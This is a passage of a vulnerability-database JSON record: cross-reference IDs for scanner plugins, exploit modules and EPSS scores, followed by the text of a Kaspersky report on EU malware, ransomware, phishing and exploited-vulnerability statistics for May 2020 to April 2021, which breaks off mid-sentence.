["MSF:AUXILIARY/GATHER/EXCHANGE_PROXYLOGON_COLLECTOR/", "MSF:AUXILIARY/SCANNER/HTTP/EXCHANGE_PROXYLOGON/", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYLOGON_RCE/", "MSF:ILITIES/FREEBSD-CVE-2021-21159/", "MSF:ILITIES/MSFT-CVE-2021-26857/", "MSF:ILITIES/MSFT-CVE-2021-26858/"]}, {"type": "mmpc", "idList": ["MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2018-0802", "MS:CVE-2021-1647", "MS:CVE-2021-1732", "MS:CVE-2021-21139", "MS:CVE-2021-21166", "MS:CVE-2021-24074", "MS:CVE-2021-24086", "MS:CVE-2021-24092", "MS:CVE-2021-24094", "MS:CVE-2021-26411", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618", "KB4011643", "KB5000800", "KB5000809"]}, {"type": "msrc", "idList": ["MSRC:E730BB5421ADC3C2D8E7B5B1C5CD88FB", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201892253"]}, {"type": "nessus", "idList": ["701323.PASL", "ADOBE_ACROBAT_APSB21-09.NASL", "ADOBE_READER_APSB21-09.NASL", "DEBIAN_DSA-4846.NASL", "DEBIAN_DSA-4858.NASL", "DEBIAN_DSA-4886.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "FEDORA_2021-05AFA65D39.NASL", "FEDORA_2021-48866282E5.NASL", "FEDORA_2021-7FB30B9381.NASL", "FEDORA_2021-C88A96BD4B.NASL", "FREEBSD_PKG_3E01AAD2680E11EB83E2E09467587C17.NASL", "FREEBSD_PKG_4ED0E43C5CEF11EBBAFD3065EC8FD3EC.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GENTOO_GLSA-202101-13.NASL", "GOOGLE_CHROME_88_0_4324_96.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "HAFNIUM_IOC_DETECT.NBIN", "MACOSX_GOOGLE_CHROME_88_0_4324_96.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "MACOS_ADOBE_ACROBAT_APSB21-09.NASL", "MACOS_ADOBE_READER_APSB21-09.NASL", "MICROSOFT_EDGE_CHROMIUM_88_0_705_50.NASL", "MICROSOFT_EDGE_CHROMIUM_88_0_705_63.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "OPENSUSE-2021-166.NASL", "OPENSUSE-2021-267.NASL", "OPENSUSE-2021-296.NASL", "OPENSUSE-2021-392.NASL", "SMB_NT_MS21_FEB_4601318.NASL", "SMB_NT_MS21_FEB_4601331.NASL", "SMB_NT_MS21_FEB_FEP.NASL", "SMB_NT_MS21_FEB_WIN_DEFENDER.NASL", "SMB_NT_MS21_JAN_FEP.NASL", "SMB_NT_MS21_JAN_WIN_DEFENDER.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "QUALYSBLOG:B847D61CCF30D86B3C35C9E4CA764114"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5", "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502"]}, {"type": "saint", "idList": ["SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:A3D3514100806269750A23D748D34C59", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:F1FC61836DCAA7F1E27411092B208523"]}, {"type": "seebug", "idList": ["SSV:99168", "SSV:99189", "SSV:99260"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0166-1", "OPENSUSE-SU-2021:0173-1", "OPENSUSE-SU-2021:0177-1", "OPENSUSE-SU-2021:0186-1", "OPENSUSE-SU-2021:0267-1", "OPENSUSE-SU-2021:0276-1", "OPENSUSE-SU-2021:0296-1", "OPENSUSE-SU-2021:0392-1", "OPENSUSE-SU-2021:0401-1", "OPENSUSE-SU-2021:0413-1", "OPENSUSE-SU-2021:0973-1", "OPENSUSE-SU-2021:1016-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46"]}, {"type": "thn", "idList": ["THN:0C87C22B19E7073574F7BA69985A07BF", "THN:15BF409706D7240A5276C705732D745F", "THN:1628F014C29F23FB8C8FF7EBC7ADC137", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:814DFC4A310E0C39823F3110B0457F8C", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:970890B8E519A3BC5427798160F5F09C", "THN:9AB21B61AFE09D4EEF533179D0907C03", "THN:9CF96D7230D0DBA395C1DEDA718226AD", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:A73831555CB04403ED3302C1DDC239B1", "THN:ABF9BC598B143E7226083FE7D2952CAE", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BBBFDA7EEE18F813A5DA572FD390D528", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:CDCF433A7837180E1F294791C672C5BB", "THN:DADA9CB340C28F942D085928B22B103F", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "THN:F163C7AB35BEF8E28924E14B02752181", "THN:F197A729A4F49F957F9D5910875EBAAA", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FA6A50184463DFCD20073D5EDD0F36F2"]}, {"type": "threatpost", "idList": ["THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:18C67680771D8DB6E95B3E3C7854114F", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:34CC110D7F26B1B4D3B97BE05F000B69", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:62A15BEBBD95FBF8704B78058BF030F1", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:B79D0A844D2D8BF7A75F2D397398D75A", "THREATPOST:B879E243998561911585BBD37B7F33E9", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:CF9E25BD324C5940B0795721CA134155", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "THREATPOST:F006B56821C572012C6CBF003C78C596", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:FF67AF009F2F0031599099334F6CC306", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-21139", "UB:CVE-2021-21148", "UB:CVE-2021-21166"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-2523", "epss": "0.960690000", "percentile": "0.991190000", "modified": "2023-03-17"}, {"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998980000", "modified": "2023-03-16"}, {"cve": "CVE-2018-0802", "epss": "0.974870000", "percentile": "0.999420000", "modified": "2023-03-16"}, {"cve": "CVE-2021-1647", "epss": "0.973570000", "percentile": "0.997930000", "modified": "2023-03-17"}, {"cve": "CVE-2021-1732", "epss": "0.003950000", "percentile": "0.692850000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21017", "epss": "0.675240000", "percentile": "0.973430000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21139", "epss": "0.001510000", "percentile": "0.495200000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21148", "epss": "0.013990000", "percentile": "0.843720000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21166", "epss": "0.026870000", "percentile": "0.887900000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21972", "epss": "0.973850000", "percentile": "0.998170000", "modified": "2023-03-17"}, {"cve": "CVE-2021-24074", "epss": "0.215380000", "percentile": "0.956590000", "modified": "2023-03-17"}, {"cve": "CVE-2021-24086", "epss": "0.001350000", "percentile": "0.469640000", "modified": "2023-03-16"}, {"cve": "CVE-2021-24092", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-24094", "epss": "0.215380000", "percentile": "0.956590000", "modified": "2023-03-17"}, {"cve": "CVE-2021-25274", "epss": "0.049240000", "percentile": "0.915200000", "modified": "2023-03-17"}, {"cve": "CVE-2021-25275", "epss": "0.000570000", "percentile": "0.215290000", "modified": "2023-03-17"}, {"cve": "CVE-2021-25276", "epss": "0.000480000", "percentile": "0.146690000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26411", "epss": "0.964250000", "percentile": "0.992420000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26855", "epss": "0.975430000", "percentile": "0.999880000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26857", "epss": "0.053690000", "percentile": "0.918940000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26858", "epss": "0.106070000", "percentile": "0.940930000", "modified": "2023-03-17"}, {"cve": "CVE-2021-27065", "epss": "0.943940000", "percentile": "0.986930000", "modified": "2023-03-17"}], "vulnersScore": 0.8}, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660032824, "score": 1660035404, "epss": 1679073339}, "_internal": {"score_hash": "41e428b082b22d87709f2d1fea8745e6"}}

{"securelist": [{"lastseen": "2021-05-26T10:37:33", "description": "\n\n_All statistics in this report are from the global cloud service Kaspersky Security Network (KSN), which receives information from components in our security solutions. The data was obtained from users who have given their consent to it being sent to KSN. Millions of Kaspersky users around the globe assist us in this endeavor to collect information about malicious activity. The statistics in this report cover the period from May 2020 to April 2021, inclusive._\n\n## Main figures\n\n * **70% **of Internet user computers in the EU experienced at least one **Malware-class** attack.\n * In the EU, Kaspersky solutions blocked **115,452,157** web attacks.\n * **2,676,988 **unique URLs were recognized as malicious by our Web Anti-Virus.\n * **377,685 **unique malicious objects were blocked by our Web Anti-Virus.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the devices of **79,315** users.\n * **56,877 **unique users in the EU were attacked by ransomware.\n * **132,656 **unique users in the EU were attacked by miners.\n * **40%** users of Kaspersky solutions in the EU encountered at least one phishing attack.\n * **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU.\n\n## Financial threats\n\n_The statistics include not only banking threats, but malware for ATMs and payment terminals._\n\n### Number of users attacked by banking malware\n\nDuring the reporting period, Kaspersky solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of **79,315** users.\n\n_Number of EU users attacked by financial malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124132/01-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware, for each EU country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all attacked users in that country.\n\n_Geography of banking malware attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124226/02-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked users **\n\n| **Country** | **%*** \n---|---|--- \n1 | Cyprus | 1.3 \n2 | Bulgaria | 1.2 \n3 | Greece | 1.1 \n4 | Italy | 1.0 \n5 | Portugal | 1.0 \n6 | Croatia | 0.8 \n7 | Germany | 0.6 \n8 | Latvia | 0.6 \n9 | Poland | 0.6 \n10 | Romania | 0.6 \n \n_* The share of unique users in the EU whose computers were targeted by financial malware in the total number of unique EU users attacked by all kinds of malware._\n\n**Top 10 financial malware families**\n\n| **Name** | **%*** \n---|---|--- \n1 | Zbot | 24.7 \n2 | Nymaim | 11.5 \n3 | Danabot | 9.9 \n4 | Emotet | 8.9 \n5 | CliptoShuffler | 7.7 \n6 | BitStealer | 5.6 \n7 | SpyEyes | 3.5 \n8 | Gozi | 3.4 \n9 | Dridex | 3.2 \n10 | Trickster | 1.9 \n \n_* The share of unique users in the EU attacked by this malware in the total number of users attacked by financial malware._\n\n## Ransomware programs\n\nDuring the reporting period, we identified more than **17,317 **ransomware modifications and detected **25** new families. Note that we did not create a separate family for each new piece of ransomware. Most threats of this type were assigned the generic verdict, which we give to new and unknown samples.\n\n_Number of new ransomware modifications detected in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124303/03-en-european-ksb-2021.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nDuring the reporting period, ransomware Trojans attacked **56,877** unique users, including **12,358** corporate users (excluding SMBs) and **2,274** users associated with small and medium-sized businesses.\n\n_Number of users in the EU attacked by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124332/04-en-european-ksb-2021.png>))_\n\n### Threat geography\n\n_Geography of attacks in the EU by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124520/05-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked users **\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 0.56 \n2 | Cyprus | 0.38 \n3 | Portugal | 0.36 \n4 | Bulgaria | 0.31 \n5 | Hungary | 0.29 \n6 | Italy | 0.29 \n7 | Latvia | 0.28 \n8 | Slovenia | 0.27 \n9 | Spain | 0.26 \n10 | Estonia | 0.23 \n \n_* The share of unique users in the EU country whose computers were targeted by ransomware in the total number of unique users in that country attacked by all kinds of malware._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Gen | 14.40 \n2 | (generic verdict) | Trojan-Ransom.Win32.Agent | 12.58 \n3 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 10.80 \n4 | (generic verdict) | Trojan-Ransom.Win32.Generic | 5.94 \n5 | Stop | Trojan-Ransom.Win32.Stop | 3.87 \n6 | WannaCry | Trojan-Ransom.Win32.Wanna | 3.20 \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 2.31 \n8 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.30 \n9 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.97 \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.85 \n \n_* The share of unique Kaspersky users attacked by the given family of ransomware Trojans in the total number of users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of users attacked by miners in the EU\n\nDuring the reporting period, we detected attempts to install a miner on the computers of **132,656** unique users. Miners accounted for 0.53% of all attacks and 10.31% of all Risktool-type programs\n\n_Number of EU users attacked by miners, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124550/06-en-european-ksb-2021.png>))_\n\nDuring the reporting period, Kaspersky products detected Trojan.Win32.Miner.gen (generic verdict) more often than others, which accounted for 13.62% of all users attacked by miners. It was followed by Trojan.Win32.Miner.bbb (8.67%) and Trojan.JS.Miner.m (2.84%).\n\n### Threat geography\n\n_Geography of miner-related attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124619/07-en-european-ksb-2021.png>))_\n\n## Vulnerable applications used by cybercriminals\n\nIn 2020, most vulnerabilities were discovered by researchers before attackers could exploit them. However, there was no doing without zero-day vulnerabilities, of which Kaspersky found:\n\n * CVE-2020-1380, a use-after-free vulnerability in the Jscript9 component of Microsoft&#x27;s Internet Explorer browser caused by insufficient checks during the generation of optimized JIT code. This vulnerability was most likely used by the APT group [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) at the first stage of system compromise, after which the payload was delivered by an additional exploit that escalated privileges in the system;\n * CVE-2020-0986 in the GDI Print/Print Spooler component of Microsoft&#x27;s Windows operating system, enabling manipulation of process memory for arbitrary code execution in the context of a system service process. Exploitation of this vulnerability gives attackers the ability to bypass sandboxes, for example, in the browser.\n\nThe first quarter of 2021 turned out to be rich not only in well-known vulnerabilities, but also in zero-day ones. In particular, both [IT security specialists](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals showed great interest in the new Microsoft Exchange Server vulnerabilities:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>) \u2014 a Service-Side Request Forgery vulnerability that allows an attacker to make a forged server request and execute arbitrary code (RCE);\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>) \u2014 insecure object deserialization by the Unified Messaging service, which can lead to arbitrary code execution on the server side;\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>) \u2014 allows an attacker to write data to server files, which can also lead to remote code execution;\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>) \u2014 similar to [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), this vulnerability allow an authorized Microsoft Exchange user to write arbitrary code to system files.\n\nThese vulnerabilities were found [in-the-wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and had been used by APT and ransomware groups.\n\nOne more constellation of vulnerabilities that appeared in the infosec sky was a threesome of critical bugs in the popular SolarWinds Orion Platform \u2013 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>), [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>). Successful exploitation of any of them can cause infection of the system where the platform is installed (mostly, enterprise and government PCs).\n\n_Distribution of exploits used in attacks by type of application attacked, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124650/08-en-european-ksb-2021.png>))_\n\n_The rating of vulnerable applications is based on verdicts by Kaspersky products for blocked exploits used by cybercriminals both in network attacks and in vulnerable local apps, including on users&#x27; mobile devices._\n\nNetwork attacks were the most common method of system penetration, and a significant portion of them is made up of brute-force attacks on various network services: [RDP](<https://securelist.com/remote-spring-the-rise-of-rdp-bruteforce-attacks/96820/>), Microsoft SQL Server, etc. In addition, the year gone by demonstrated that everything in the Windows operating system is cyclical, and that most of the detected vulnerabilities exist in the same services, for example, in the drivers of the SMB (SMBGhost, SMBBleed), DNS (SigRed) and ICMPv6 (BadNeighbor) network protocols. Two critical vulnerabilities (CVE-2020-0609, CVE-2020-0610) were found in the Remote Desktop Gateway service. An interesting vulnerability, dubbed Zerologon, was also discovered in the NetLogon service. In Q1 2021, researchers found three new vulnerabilities in Windows network stack code related to IPv4/IPv6 protocols processing \u2014 [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>). Lastly, despite the fact that exploits for the EternalBlue and EternalRomance families are old, they are still used by attackers.\n\n## Attacks on macOS\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 14.50 \n2 | AdWare.OSX.Bnodlero.at | 12.04 \n3 | AdWare.OSX.Bnodlero.ay | 11.42 \n4 | AdWare.OSX.Bnodlero.ax | 10.56 \n5 | AdWare.OSX.Bnodlero.bg | 9.18 \n6 | Trojan-Downloader.OSX.Shlayer.a | 8.06 \n7 | AdWare.OSX.Pirrit.j | 6.23 \n8 | AdWare.OSX.Pirrit.ac | 6.05 \n9 | AdWare.OSX.Ketin.h | 5.30 \n10 | AdWare.OSX.Bnodlero.t | 4.94 \n11 | AdWare.OSX.Bnodlero.av | 4.82 \n12 | Trojan-Downloader.OSX.Agent.h | 4.48 \n13 | AdWare.OSX.Pirrit.o | 4.35 \n14 | AdWare.OSX.Cimpli.k | 3.75 \n15 | AdWare.OSX.Pirrit.gen | 3.75 \n16 | AdWare.OSX.Pirrit.aa | 3.58 \n17 | AdWare.OSX.Ketin.m | 3.22 \n18 | AdWare.OSX.Pirrit.q | 3.20 \n19 | AdWare.OSX.Ketin.l | 3.13 \n20 | AdWare.OSX.Spc.a | 2.87 \n \n_* The share of unique users who encountered this threat in the total number of users of Kaspersky security solutions for macOS who were attacked._\n\n### Threat geography\n\n_Geography of attacked macOS users in EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124726/09-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked macOS users **\n\n| **Country** | **%*** \n---|---|--- \n1 | France | 15.32 \n2 | Spain | 13.99 \n3 | Italy | 11.43 \n4 | Portugal | 9.75 \n5 | Greece | 9.59 \n6 | Germany | 9.41 \n7 | Hungary | 8.60 \n8 | Lithuania | 8.14 \n9 | Poland | 8.10 \n10 | Belgium | 7.94 \n \n_* The share of unique users attacked in the total number of users of Kaspersky security solutions for macOS in the country._\n\n## IoT attacks\n\n### IoT threat statistics\n\nDuring the reporting period, more than 80% of attacks on Kaspersky traps were carried out using the Telnet protocol.\n\nTelnet | 81.31% \n---|--- \nSSH | 18.69% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, May 2020 \u2013 April 2021_\n\nAs for distribution of sessions, Telnet also prevails, accounting for three quarters of all working sessions.\n\nTelnet | 75.66% \n---|--- \nSSH | 24.34% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, May 2020 \u2013 April 2021_\n\nAs a result, devices that carried out attacks using the Telnet protocol were selected to build the map of attackers&#x27; IP addresses.\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124758/10-en-european-ksb-2021.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 26.84 \n2 | Italy | 18.55 \n3 | Germany | 7.92 \n4 | Spain | 7.46 \n5 | Poland | 5.66 \n6 | France | 5.60 \n7 | Romania | 5.52 \n8 | Sweden | 4.52 \n9 | Netherlands | 3.65 \n10 | Hungary | 2.95 \n \n_* The share of devices from which attacks were carried out in the given country in the total number of devices._\n\n### Malware loaded into honeypots\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 42.57 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.96 \n3 | Backdoor.Linux.Mirai.ba | 9.79 \n4 | Backdoor.Linux.Gafgyt.a | 5.42 \n5 | Backdoor.Linux.Gafgyt.a | 2.74 \n6 | Backdoor.Linux.Gafgyt.bj | 1.44 \n7 | Trojan-Downloader.Shell.Agent.p | 1.31 \n8 | Backdoor.Linux.Agent.bc | 1.20 \n9 | Backdoor.Linux.Mirai.cw | 1.15 \n10 | Backdoor.Linux.Mirai.cn | 0.82 \n \n_* The share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose, and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of the specific IP address (GeoIP) is established._\n\nKaspersky solutions in the EU blocked **115,452,157 **attacks launched from online resources across the globe. Moreover, 89.33% of these resources were located in just 10 countries.\n\n_Distribution of web attack sources by country, May 2020 \u2013 April 2021 